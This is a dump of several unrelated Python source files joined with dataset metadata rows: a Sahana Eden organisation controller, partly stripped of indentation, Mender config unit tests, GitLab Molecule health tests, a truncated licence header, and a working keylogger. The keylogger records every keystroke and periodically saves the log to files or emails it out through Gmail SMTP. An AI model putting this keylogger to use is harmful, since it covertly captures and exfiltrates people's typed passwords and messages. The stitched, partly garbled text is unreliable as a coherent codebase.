            marker = "%s_red" % marker
        elif reqs == 2:
            # Medium
            marker = "%s_yellow" % marker
        elif reqs == 1:
            # Low
            marker = "%s_green" % marker
    # Look up the marker image; fall back to the generic office marker if
    # the (possibly colour-suffixed) marker name is not in gis_marker
    mtable = db.gis_marker
    try:
        marker = db(mtable.name == marker).select(mtable.image,
                                                  mtable.height,
                                                  mtable.width,
                                                  cache=s3db.cache,
                                                  limitby=(0, 1)
                                                  ).first()
    except:
        marker = db(mtable.name == "office").select(mtable.image,
                                                    mtable.height,
                                                    mtable.width,
                                                    cache=s3db.cache,
                                                    limitby=(0, 1)
                                                    ).first()
    return marker
# -----------------------------------------------------------------------------
def facility():
""" RESTful CRUD controller """
# Pre-processor
def prep(r):
# Location Filter
s3db.gis_location_filter(r)
if r.interactive:
if r.component:
cname = r.component.name
if cname in ("inv_item", "recv", "send"):
# Filter out items which are already in this inventory
s3db.inv_prep(r)
# remove CRUD generated buttons in the tabs
s3db.configure("inv_inv_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
elif cname == "human_resource":
# Filter to just Staff
s3.filter = (s3db.hrm_human_resource.type == 1)
# Make it clear that this is for adding new staff, not assigning existing
s3.crud_strings.hrm_human_resource.label_create_button = T("Add New Staff Member")
# Cascade the organisation_id from the office to the staff
htable = s3db.hrm_human_resource
field = htable.organisation_id
field.default = r.record.organisation_id
field.writable = False
field.comment = None
# Filter out people which are already staff for this office
s3_filter_staff(r)
elif cname == "req" and r.method not in ("update", "read"):
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
s3db.req_create_form_mods()
elif r.id:
field = r.table.obsolete
field.readable = field.writable = True
elif r.method == "map":
# Tell the client to request per-feature markers
s3db.configure("org_facility", marker_fn=facility_marker_fn)
elif r.representation == "geojson":
# Load these models now as they'll be needed when we encode
mtable = s3db.gis_marker
s3db.configure("org_facility", marker_fn=facility_marker_fn)
return True
s3.prep = prep
def postp(r, output):
if r.representation == "plain" and \
r.method !="search":
# Custom Map Popup
output = TABLE()
append = output.append
# Edit button
append(TR(TD(A(T("Edit"),
_target="_blank",
_id="edit-btn",
_href=URL(args=[r.id, "update"])))))
# Name
append(TR(TD(B("%s:" % T("Name"))),
TD(r.record.name)))
# Type
if r.record.facility_type_id:
append(TR(TD(B("%s:" % r.table.facility_type_id.label)),
TD(r.table.facility_type_id.represent(r.record.facility_type_id))))
# Comments
if r.record.comments:
append(TR(TD(B("%s:" % r.table.comments.label)),
TD(r.record.comments)))
# Organization (better with just name rather than Represent)
# @ToDo: Make this configurable - some deployments will only see
# their staff so this is a meaningless field
table = s3db.org_organisation
query = (table.id == r.record.organisation_id)
org = db(query).select(table.name,
limitby=(0, 1)).first()
if org:
append(TR(TD(B("%s:" % r.table.organisation_id.label)),
TD(org.name)))
# Requests link to the Site_ID
site_id = r.record.site_id
# Open/High/Medium priority Requests
rtable = s3db.req_req
query = (rtable.site_id == site_id) & \
(rtable.fulfil_status != 2) & \
(rtable.priority.belongs((2, 3)))
reqs = db(query).select(rtable.id,
rtable.req_ref,
rtable.type,
)
if reqs:
append(TR(TD(B("%s:" % T("Requests")))))
req_types = {1:"req_item",
3:"req_skill",
8:"",
9:"",
}
vals = [A(req.req_ref,
_href=URL(c="req", f="req",
args=[req.id, req_types[req.type]])) for req in reqs]
for val in vals:
append(TR(TD(val, _colspan=2)))
gtable = s3db.gis_location
stable = s3db.org_site
query = (gtable.id == stable.location_id) & \
(stable.id == site_id)
location = db(query).select(gtable.addr_street,
limitby=(0, 1)).first()
# Street address
if location.addr_street:
append(TR(TD(B("%s:" % gtable.addr_street.label)),
TD(location.addr_street)))
# Opening Times
opens = r.record.opening_times
if opens:
append(TR(TD(B("%s:" % r.table.opening_times.label)),
TD(opens)))
# Phone number
contact = r.record.contact
if contact:
append(TR(TD(B("%s:" % r.table.contact.label)),
TD(contact)))
# Phone number
phone1 = r.record.phone1
if phone1:
append(TR(TD(B("%s:" % r.table.phone1.label)),
TD(phone1)))
# Email address (as hyperlink)
email = r.record.email
if email:
append(TR(TD(B("%s:" % r.table.email.label)),
TD(A(email, _href="mailto:%s" % email))))
# Website (as hyperlink)
website = r.record.website
if website:
append(TR(TD(B("%s:" % r.table.website.label)),
TD(A(website, _href=website))))
return output
s3.postp = postp
output = s3_rest_controller(rheader=s3db.org_rheader)
return output
# -----------------------------------------------------------------------------
def facility_type():
    """ RESTful CRUD controller """
    # Simple lookup-table maintenance: default REST dispatch is enough.
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def office_type():
    """ RESTful CRUD controller """
    # Simple lookup-table maintenance: default REST dispatch is enough.
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation_type():
    """ RESTful CRUD controller """
    # Simple lookup-table maintenance: default REST dispatch is enough.
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation():
    """ RESTful CRUD controller

    The actual behaviour (filters, rheader, tabs) lives in
    s3db.org_organisation_controller() so several controllers can share it.
    """
    # Defined in the Model for use from Multiple Controllers for unified menus
    return s3db.org_organisation_controller()
# -----------------------------------------------------------------------------
def org_search():
    """
    Organisation REST controller
    - limited to just search.json for use in Autocompletes
    - allows differential access permissions
    """
    # Reject everything except the JSON search method, so this endpoint
    # can be granted wider read access than the full organisation CRUD.
    s3.prep = lambda r: r.representation == "json" and \
                        r.method == "search"
    return s3_rest_controller(module, "organisation")
# -----------------------------------------------------------------------------
def organisation_list_represent(l):
    """Represent a list of organisation ids as a comma-separated string.

    Lists longer than 4 entries are truncated to the first 4 names
    followed by ", etc".  An empty/None list is represented as NONE.

    :param l: list of organisation ids (or a falsy value)
    :return: display string
    """
    organisation_represent = s3db.org_organisation_represent
    if not l:
        return NONE
    # Cap the output at 4 organisations to keep table cells readable.
    # (The previous implementation counted items manually and shadowed
    # the builtin max().)
    limit = 4
    names = ", ".join(organisation_represent(x) for x in l[:limit])
    if len(l) > limit:
        return "%s, etc" % names
    return names
# -----------------------------------------------------------------------------
def office():
    """ RESTful CRUD controller

    The actual behaviour (filters, rheader, tabs) lives in
    s3db.org_office_controller() so several controllers can share it.
    """
    # Defined in the Model for use from Multiple Controllers for unified menus
    return s3db.org_office_controller()
# -----------------------------------------------------------------------------
def person():
    """ Person controller for AddPersonWidget """
    def prep(r):
        if r.representation != "s3json":
            # Do not serve other representations here
            return False
        else:
            # Expose record ids in the s3json output so the widget can
            # link the person back to the requesting form.
            s3mgr.show_ids = True
            return True
    s3.prep = prep
    return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def room():
    """ RESTful CRUD controller """
    # Simple lookup-table maintenance: default REST dispatch is enough.
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def mailing_list():
""" RESTful CRUD controller """
tablename = "pr_group"
table = s3db[tablename]
# Only groups with a group_type of 5
response.s3.filter = (table.group_type == 5)
table.group_type.writable = False
table.group_type.readable = False
table.name.label = T("Mailing List Name")
s3.crud_strings[tablename] = s3.pr_mailing_list_crud_strings
# define the list_fields
list_fields = s3db.configure(tablename,
list_fields = ["id",
"name",
"description",
])
# Components
_rheader = s3db.pr_rheader
_tabs = [(T("Organisation"), "organisation/"),
(T("Mailing List Details"), None),
]
if len(request.args) > 0:
_tabs.append((T("Members"), "group_membership"))
if "viewing" in request.vars:
tablename, record_id = request.vars.viewing.rsplit(".", 1)
if tablename == "org_organisation":
table = s3db[tablename]
_rheader = s3db.org_rheader
_tabs = []
s3db.add_component("pr_group_membership", pr_group="group_id")
rheader = lambda r: _rheader(r, tabs = _tabs)
return s3_rest_controller("pr",
"group",
rheader=rheader)
# -----------------------------------------------------------------------------
def donor():
    """ RESTful CRUD controller """
    tablename = "org_donor"
    table = s3db[tablename]
    # NOTE(review): redundant -- tablename is already "org_donor" above.
    tablename = "org_donor"
    # NOTE(review): ADD_DONOR is not defined in this excerpt; presumably a
    # T("Add Donor") constant defined elsewhere -- confirm before running.
    s3.crud_strings[tablename] = Storage(
        title_create = ADD_DONOR,
        title_display = T("Donor Details"),
        title_list = T("Donors Report"),
        title_update = T("Edit Donor"),
        title_search = T("Search Donors"),
        subtitle_create = T("Add New Donor"),
        label_list_button = T("List Donors"),
        label_create_button = ADD_DONOR,
        label_delete_button = T("Delete Donor"),
        msg_record_created = T("Donor added"),
        msg_record_modified = T("Donor updated"),
        msg_record_deleted = T("Donor deleted"),
        msg_list_empty = T("No Donors currently registered"))
    # Donors are added through other workflows, not via the list view.
    s3db.configure(tablename, listadd=False)
    output = s3_rest_controller()
    return output
# -----------------------------------------------------------------------------
def req_match():
    """ Match Requests for Sites """
    # Delegates to the shared implementation in the Requests model.
    return s3db.req_match()
# -----------------------------------------------------------------------------
def incoming():
    """
        Incoming Shipments for Sites

        @unused

        Thin wrapper around the inventory module's incoming-shipments view.
    """
    # NOTE(review): inv_incoming is not defined in this excerpt --
    # presumably a web2py global injected by the inv module; confirm.
    return inv_incoming()
# END =========================================================================
| 7,351 | 0 | 154 |
b3f2a2368437d0b7be4bea6c4d8c9ddf78a836c9 | 8,893 | py | Python | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | 21 | 2021-03-05T07:43:48.000Z | 2022-03-21T11:19:23.000Z | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging as log
import os
import pytest
import mender.config.config as config
GLOBAL_TESTDATA = {
"InventoryPollIntervalSeconds": 200,
"RootfsPartA": "/dev/hda2",
"RootfsPartB": "/dev/hda3",
"ServerURL": "https://hosted.mender.io",
"TenantToken": """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP""",
}
LOCAL_TESTDATA = {
"InventoryPollIntervalSeconds": 100,
"UpdatePollIntervalSeconds": 100,
"RetryPollIntervalSeconds": 100,
}
@pytest.fixture(scope="session", name="local_and_global")
@pytest.fixture(scope="session", name="global_only")
@pytest.fixture(scope="session", name="local_only")
@pytest.fixture(scope="session", name="local_priority")
| 41.948113 | 96 | 0.732261 | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging as log
import os
import pytest
import mender.config.config as config
GLOBAL_TESTDATA = {
"InventoryPollIntervalSeconds": 200,
"RootfsPartA": "/dev/hda2",
"RootfsPartB": "/dev/hda3",
"ServerURL": "https://hosted.mender.io",
"TenantToken": """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP""",
}
LOCAL_TESTDATA = {
"InventoryPollIntervalSeconds": 100,
"UpdatePollIntervalSeconds": 100,
"RetryPollIntervalSeconds": 100,
}
@pytest.fixture(scope="session", name="local_and_global")
def fixture_local_and_global():
    """Return a Config loaded from the checked-in local AND global files."""
    # BUG FIX: the global filename was misspelt "global_medner.conf".
    # The rest of this module (e.g. TestFileNotFound) uses
    # "tests/unit/data/configs/global_mender.conf", which is the file
    # that actually exists, so the fixture silently loaded no global file.
    return config.load(
        "tests/unit/data/configs/local_mender.conf",
        "tests/unit/data/configs/global_mender.conf",
    )
@pytest.fixture(scope="session", name="global_only")
def fixture_():
    """Yield a Config loaded from a generated global config file only.

    NOTE(review): the function name looks truncated (cf. fixture_local_only).
    pytest resolves the fixture via name="global_only", so behaviour is
    unaffected; kept as-is to preserve the public identifier.
    """
    path = "tests/unit/data/configs/global_mender_testdata.conf"
    with open(path, "w") as f:
        json.dump(GLOBAL_TESTDATA, f)
    try:
        # Empty local path: only the global file contributes settings.
        yield config.load("", path)
    finally:
        # Runs even if config.load raises, so the generated file never leaks.
        if os.path.isfile(path):
            os.remove(path)
@pytest.fixture(scope="session", name="local_only")
def fixture_local_only():
    """Yield a Config built from generated LOCAL_TESTDATA only."""
    path = "tests/unit/data/configs/local_mender_testdata.conf"
    with open(path, "w") as f:
        json.dump(LOCAL_TESTDATA, f)
    try:
        # NOTE(review): the argument order elsewhere in this module is
        # (local, global) -- see TestFileNotFound -- so the empty string
        # here fills the *local* slot and this file is actually loaded as
        # the global config. Confirm this is intended.
        yield config.load("", path)
    finally:
        # Runs even if config.load raises, so the generated file never leaks.
        if os.path.isfile(path):
            os.remove(path)
@pytest.fixture(scope="session", name="local_priority")
def fixture_local_priority():
    """Yield a Config loaded from generated local AND global files.

    Lets tests verify that locally-defined settings take priority over
    globally-defined ones.
    """
    local_path = "tests/unit/data/configs/local_mender_testdata.conf"
    global_path = "tests/unit/data/configs/global_mender_testdata.conf"
    with open(local_path, "w") as f:
        json.dump(LOCAL_TESTDATA, f)
    with open(global_path, "w") as f:
        json.dump(GLOBAL_TESTDATA, f)
    try:
        yield config.load(local_path, global_path)
    finally:
        # Remove the generated files even if config.load raises during
        # setup (previously a setup failure leaked both files).
        for path in (global_path, local_path):
            if os.path.isfile(path):
                os.remove(path)
class TestConfigInstance:
    """config.load must return a Config (a dict subclass, per the first
    test) for every combination of available configuration files, and must
    raise when neither file exists."""
    def test_both_instance(self, local_and_global):
        assert isinstance(local_and_global, config.Config)
        assert isinstance(local_and_global, dict)
    def test_glob_instance(self, global_only):
        assert isinstance(global_only, config.Config)
    def test_local_instance(self, local_only):
        assert isinstance(local_only, config.Config)
    def test_no_path_instance(self):
        # No configuration file at all is an error, not an empty Config.
        with pytest.raises(config.NoConfigurationFileError):
            config.load("", "")
class TestLocal:
    """Attribute values when only LOCAL_TESTDATA is loaded."""

    def test_local_values(self, local_only):
        """Interval values come from the file; the rest are empty defaults."""
        expected = {
            "ServerURL": "",
            "RootfsPartA": "",
            "RootfsPartB": "",
            "TenantToken": "",
            "InventoryPollIntervalSeconds": 100,
            "UpdatePollIntervalSeconds": 100,
            "RetryPollIntervalSeconds": 100,
            "ServerCertificate": "",
        }
        for attribute, value in expected.items():
            assert getattr(local_only, attribute) == value, attribute
class TestGlobal:
    """Attribute values when only the global configuration file is loaded."""
    def test_no_path(self, global_only):
        """All set values come from GLOBAL_TESTDATA; the poll intervals it
        does not define fall back to defaults (5, per the assertions)."""
        assert global_only.ServerURL == "https://hosted.mender.io"
        assert global_only.RootfsPartA == "/dev/hda2"
        assert global_only.RootfsPartB == "/dev/hda3"
        # The multi-line token literal must match GLOBAL_TESTDATA exactly,
        # including the embedded newlines.
        assert (
            global_only.TenantToken
            == """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP"""
        )
        assert global_only.InventoryPollIntervalSeconds == 200
        # Not present in GLOBAL_TESTDATA -> default values.
        assert global_only.UpdatePollIntervalSeconds == 5
        assert global_only.RetryPollIntervalSeconds == 5
        assert global_only.ServerCertificate == ""
class TestLocalPriority:
    """When both files define a key, the local value must win."""

    def test_local_priority(self, local_priority):
        # LOCAL_TESTDATA says 100, GLOBAL_TESTDATA says 200 -> local wins.
        interval = local_priority.InventoryPollIntervalSeconds
        assert interval == 100

    def test_with_no_local_server_url(self, local_priority):
        # Only the global file defines ServerURL, so it falls through.
        url = local_priority.ServerURL
        assert url == "https://hosted.mender.io"
class TestFaultyJSONfile:
    """config.load must surface a JSONDecodeError from a corrupt file."""

    def test_both_faulty_json(self):
        with open("tests/unit/data/configs/local_mender_faulty.conf", "w") as f:
            json.dump(LOCAL_TESTDATA, f)
            f.write("this makes the json file faulty")
        with open("tests/unit/data/configs/global_mender_faulty.conf", "w") as f:
            json.dump(GLOBAL_TESTDATA, f)
            f.write("this makes the json file faulty")
        try:
            with pytest.raises(json.decoder.JSONDecodeError):
                # NOTE(review): the global argument points at
                # "config/global_mender_faulty.conf", not the file written
                # above -- presumably the faulty local file alone triggers
                # the error; confirm the path is intentional.
                config.load(
                    "tests/unit/data/configs/local_mender_faulty.conf",
                    "config/global_mender_faulty.conf",
                )
        finally:
            # BUG FIX: the local faulty file was previously never removed
            # and leaked into the working tree. Clean up both files even
            # if the assertion above fails.
            os.remove("tests/unit/data/configs/global_mender_faulty.conf")
            os.remove("tests/unit/data/configs/local_mender_faulty.conf")

    def test_local_faulty_json(self):
        with open("tests/unit/data/configs/local_mender_faulty.conf", "w") as f:
            json.dump(LOCAL_TESTDATA, f)
            f.write("this makes the json file faulty")
        try:
            with pytest.raises(json.decoder.JSONDecodeError):
                config.load(
                    "tests/unit/data/configs/local_mender_faulty.conf",
                    "config/global_mender.conf",
                )
        finally:
            # try/finally so a failing assertion cannot leak the file.
            os.remove("tests/unit/data/configs/local_mender_faulty.conf")

    def test_global_faulty_json(self):
        with open("tests/unit/data/configs/global_mender_faulty.conf", "w") as f:
            json.dump(GLOBAL_TESTDATA, f)
            f.write("this makes the json file faulty")
        try:
            with pytest.raises(json.decoder.JSONDecodeError):
                config.load(
                    "tests/unit/data/configs/local_mender.conf",
                    "tests/unit/data/configs/global_mender_faulty.conf",
                )
        finally:
            os.remove("tests/unit/data/configs/global_mender_faulty.conf")
class TestFileNotFound:
    """A missing configuration file is logged, but only the absence of
    BOTH files is treated as an error."""
    @pytest.fixture(autouse=True)
    def set_log_level(self, caplog):
        # Capture down to DEBUG so the "not found" messages (presumably
        # logged below the default capture level) reach caplog.text.
        caplog.set_level(log.DEBUG)
    def test_file_not_found_error_both(self, caplog):
        with pytest.raises(config.NoConfigurationFileError):
            config.load("", "")
        assert "Global configuration file: '' not found" in caplog.text
        assert "Local configuration file: '' not found" in caplog.text
    def test_file_not_found_error_local(self, caplog):
        # Local file exists, global path empty: only the global miss logged.
        config.load("tests/unit/data/configs/local_mender.conf", "")
        assert "Global configuration file: '' not found" in caplog.text
        assert "Local configuration file: '' not found" not in caplog.text
    def test_file_not_found_error_(self, caplog):
        # NOTE(review): method name looks truncated (probably meant
        # ..._global); kept as-is since renaming would change test IDs.
        # Global file exists, local path empty: only the local miss logged.
        config.load("", "tests/unit/data/configs/global_mender.conf")
        assert "Global configuration file: '' not found" not in caplog.text
        assert "Local configuration file: '' not found" in caplog.text
| 6,270 | 145 | 518 |
f798fb86638585da8abfe51ba497897f3f2698a1 | 1,761 | py | Python | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | 2 | 2021-05-14T10:31:33.000Z | 2021-05-14T20:42:58.000Z | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | 30 | 2020-02-24T00:20:11.000Z | 2022-03-26T12:02:58.000Z | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | null | null | null | import json
import os
import time
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('instance')
| 26.283582 | 63 | 0.55707 | import json
import os
import time
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('instance')
def test_health(host):
    """Poll the GitLab readiness endpoint (up to 2 minutes) until every
    subsystem reports healthy."""
    command = " ".join((
        "http",
        "--ignore-stdin",
        "--check-status",
        "--body",
        "--verify=/etc/ssl/certs/root.crt.pem",
        "https://gitlab.test/-/readiness?all=1",
    ))
    succeeded = False
    for _ in range(120):
        cmd = host.run(command=command)
        if cmd.rc == 0:
            succeeded = True
            break
        time.sleep(1)
    assert succeeded
    report = json.loads(cmd.stdout)
    assert report["status"] == "ok"
    subsystems = (
        "cache_check",
        "db_check",
        "gitaly_check",
        "master_check",
        "queues_check",
        "redis_check",
        "shared_state_check",
    )
    for name in subsystems:
        assert report[name][0]["status"] == "ok"
def test_registry_health(host):
    """Poll the container registry (up to 2 minutes); an unauthenticated
    request must receive a well-formed UNAUTHORIZED error from the v2 API."""
    command = " ".join((
        "http",
        "--ignore-stdin",
        "--check-status",
        "--body",
        "--verify=/etc/ssl/certs/root.crt.pem",
        "https://gitlab.test:5050/v2/",
    ))
    reachable = False
    for _ in range(120):
        cmd = host.run(command=command)
        # rc 0 or 4 (presumably httpie's 2xx / 4xx exit codes) both mean
        # the registry answered.
        if cmd.rc in (0, 4):
            reachable = True
            break
        time.sleep(1)
    assert reachable
    payload = json.loads(cmd.stdout)
    assert "errors" in payload
    assert len(payload["errors"]) == 1
    assert payload["errors"][0]["code"] == "UNAUTHORIZED"
7c398c153c7bb6b6efcc453e6941c3a764c02db1 | 2,336 | py | Python | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | import keyboard
import smtplib
from threading import Timer
from datetime import date, datetime
SEND_REPORT_EVERY = 60
EMAIL_ADDRESS = ''
EMAIL_PASSWORD = ''
if __name__=="__main__":
keylogger = keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start() | 32 | 82 | 0.549229 | import keyboard
import smtplib
from threading import Timer
from datetime import date, datetime
SEND_REPORT_EVERY = 60
EMAIL_ADDRESS = ''
EMAIL_PASSWORD = ''
class keylogger:
def __init__(self, interval, report_method='email'):
self.interval = interval
self.report_method = report_method
self.log = ''
self.start_dt = datetime.now()
self.end_dt = datetime.now()
def callback(self, event):
name = event.name
if len(name) > 1:
if name == 'space':
name = ' '
elif name == 'enter':
name = '[ENTER]\n'
elif name == 'decimal':
name = '.'
else:
name = name.replace(' ', '_')
name = f'[{name.upper()}]'
self.log += name
def update_filename(self):
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
def report_to_file(self):
with open(f"{self.filename}.txt", "w") as f:
print(self.log, file=f)
print(f"[+] Saved {self.filename}.txt")
def sendmail(self, email, password, message):
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
def report(self):
if self.log:
self.end_dt = datetime.now()
self.update_filename()
if self.report_method == "email":
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
elif self.report_method == "file":
self.report_to_file()
self.start_dt = datetime.now()
self.log = ""
timer = Timer(interval=self.interval, function=self.report)
timer.daemon = True
timer.start()
def start(self):
self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()
if __name__=="__main__":
keylogger = keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start() | 1,819 | -5 | 230 |
ee381545649b3406cba27450e6dd5232d6b79331 | 2,910 | py | Python | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 450 | 2015-09-05T09:12:51.000Z | 2018-08-30T01:45:36.000Z | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 1,274 | 2015-09-22T20:06:16.000Z | 2018-08-31T22:14:00.000Z | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 278 | 2015-09-21T19:15:06.000Z | 2018-08-31T00:36:51.000Z | # The MIT License
#
# Copyright (C) 2008-2009 Floris Bruynooghe
#
# Copyright (C) 2008-2009 Abilisoft Ltd.
#
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
